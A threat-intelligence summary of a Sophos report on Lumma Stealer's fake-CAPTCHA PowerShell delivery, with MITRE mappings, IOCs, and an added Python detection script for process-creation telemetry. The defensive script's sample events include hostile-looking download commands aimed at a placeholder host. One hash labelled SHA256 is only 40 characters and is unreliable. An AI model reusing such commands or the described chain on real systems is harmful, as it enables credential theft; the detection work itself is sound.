Lumma Stealer, coming and going

In late 2024, Sophos uncovered a Lumma Stealer campaign abusing fake CAPTCHA sites to trick victims into running malicious PowerShell commands, delivering an info-stealing payload that siphons credentials and crypto wallets. The malware uses obfuscation and multi-stage downloads to evade detection. (Affected: Windows users, cybersecurity sector)

Key points:

  • Lumma Stealer is an info-stealer active since mid-2022, offered as Malware-as-a-Service via Telegram.
  • The stealer targets passwords, session tokens, crypto wallets, and personal data from compromised Windows devices.
  • Attackers use fake CAPTCHA websites to trick users into pasting malicious PowerShell commands into the Windows Run dialog.
  • PowerShell scripts download and execute the Lumma Stealer payload from remote servers hosted on cloud services.
  • Payload includes obfuscated AutoIt scripts that steal browser credentials and exfiltrate data via C2 servers.
  • Alternate delivery uses disguised shortcut (.lnk) files that launch obfuscated PowerShell commands via OpenSSH utilities.
  • Payload uses AES encryption and dynamic .NET assembly loading to evade detection and perform runtime downloads.
  • The malware downloads and executes multiple payload stages, ending with exfiltration of stolen credentials.
  • Detection queries leveraging endpoint telemetry can help identify suspicious files, processes, and network activity.
  • User education to distrust CAPTCHAs and use of robust endpoint detection can mitigate Lumma Stealer risks.

MITRE Techniques:

  • Spearphishing via Service (T1194) – Using fake CAPTCHA sites to lure victims to execute malicious commands.
  • User Execution (T1204) – Victims manually paste PowerShell commands and execute disguised shortcut files.
  • PowerShell (T1059.001) – Malicious PowerShell scripts are used extensively to download and execute payloads.
  • Obfuscated Files or Information (T1027) – Payload and scripts use obfuscation, base64 encoding, and AES encryption.
  • Deobfuscate/Decode Files or Information (T1140) – Script decoding to reveal embedded PE files and further payloads.
  • Command and Scripting Interpreter (T1059) – Leveraging Windows Command Line and PowerShell for execution.
  • File and Directory Discovery (T1083) – Scripts access user directories like %AppData% and %temp% to place malicious files.
  • Exfiltration Over Command and Control Channel (T1041) – Stolen browser cookies and credentials exfiltrated to C2 servers.
  • Masquerading (T1036) – The payload is named ‘ArtistSponsorship.exe’ and shortcut files masquerade as PDFs.
  • Process Injection (T1055) – Loading the malicious PE dynamically into memory via .NET Assembly ‘Load’ method.

Indicators of Compromise:

  • The article mentions multiple malicious domains used as command-and-control servers such as snail-r1ced[.]cyou and fixedzip[.]oss-ap-southeast-5[.]aliyuncs[.]com.
  • There are SHA256 hashes of payload files including ArtistSponsorship.exe (sha256:e298cd6c5fe7b9b05a28480fd215ddcbd7aaa48a) and an obfuscated AutoIt script (sha256:05d8cf394190f3a707abfb25fb44d7da9d5f533d7d2063b23c00cc11253c8be7).
  • Indicators also include IP addresses like 104.21.84[.]251 associated with C2 infrastructure.
  • File paths such as %AppData%, %temp%, and specific filenames like ‘i1040gi.pdf’ and ‘ArtistSponsorship.exe’ are noted as infection artifacts.
  • Script behaviors including PowerShell command lines downloading scripts from URLs and suspicious execution of mshta.exe and sftp.exe proxies are observable IOCs.
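As an added example that is not part of the Sophos article, the hunting pass below turns the behaviours summarised above (Run-dialog PowerShell with a download cmdlet, base64-encoded command lines, mshta.exe and sftp.exe acting as launchers) into rules run over constructed process-creation events; the field names image, parent and cmdline are assumptions, and real EDR schemas differ.

```python
import re

# Heuristics (assumed field names: image, parent, cmdline; real EDR schemas differ).
DOWNLOAD = re.compile(r"invoke-webrequest|\biwr\b|downloadstring|net\.webclient|https?://", re.I)
ENCODED = re.compile(r"\s-(encodedcommand|enc|ec|e)\s+[A-Za-z0-9+/=]{40,}", re.I)
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
PROXIES = {"mshta.exe", "sftp.exe", "ssh.exe"}

def classify(ev):
    """Return the names of the rules one process-creation event matches."""
    img, parent, cmd = ev["image"].lower(), ev["parent"].lower(), ev["cmdline"]
    hits = []
    # Fake-CAPTCHA pattern: the Run dialog is a child of explorer.exe, so a
    # download cmdlet in a PowerShell process spawned by explorer.exe is suspect.
    if img in INTERPRETERS and parent == "explorer.exe" and DOWNLOAD.search(cmd):
        hits.append("run_dialog_download")
    # Base64-encoded command line (-e/-ec/-enc/-EncodedCommand).
    if img in INTERPRETERS and ENCODED.search(cmd):
        hits.append("encoded_powershell")
    # mshta.exe / OpenSSH sftp.exe acting as a launcher for a script interpreter.
    if parent in PROXIES and img in INTERPRETERS:
        hits.append("lolbin_proxy_launch")
    # mshta.exe pulling remote content.
    if img == "mshta.exe" and re.search(r"https?://", cmd, re.I):
        hits.append("mshta_remote_content")
    return hits

def hunt(events):
    """Return (event, hits) pairs for every event that matched at least one rule."""
    return [(ev, classify(ev)) for ev in events if classify(ev)]

# Constructed sample telemetry (not real IOCs; example.invalid never resolves).
EVENTS = [
    {"image": "powershell.exe", "parent": "explorer.exe",
     "cmdline": 'powershell.exe -w hidden -c "Invoke-WebRequest -Uri http://example.invalid/s.txt"'},
    {"image": "powershell.exe", "parent": "sftp.exe",
     "cmdline": "powershell.exe -nop -enc " + "QUFB" * 15},
    {"image": "mshta.exe", "parent": "explorer.exe",
     "cmdline": "mshta.exe http://example.invalid/page.hta"},
    {"image": "powershell.exe", "parent": "code.exe",
     "cmdline": "powershell.exe -File build.ps1"},  # benign developer activity
]

if __name__ == "__main__":
    for ev, hits in hunt(EVENTS):
        print(f"{ev['parent']} -> {ev['image']}: {', '.join(hits)}")
```

Tune the parent and download keyword lists to your environment before relying on the rules; explorer.exe as parent also covers legitimate shortcut launches, so correlate with the download cmdlet rather than alerting on the parent alone.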

Read more: https://news.sophos.com/en-us/2025/05/09/lumma-stealer-coming-and-going/
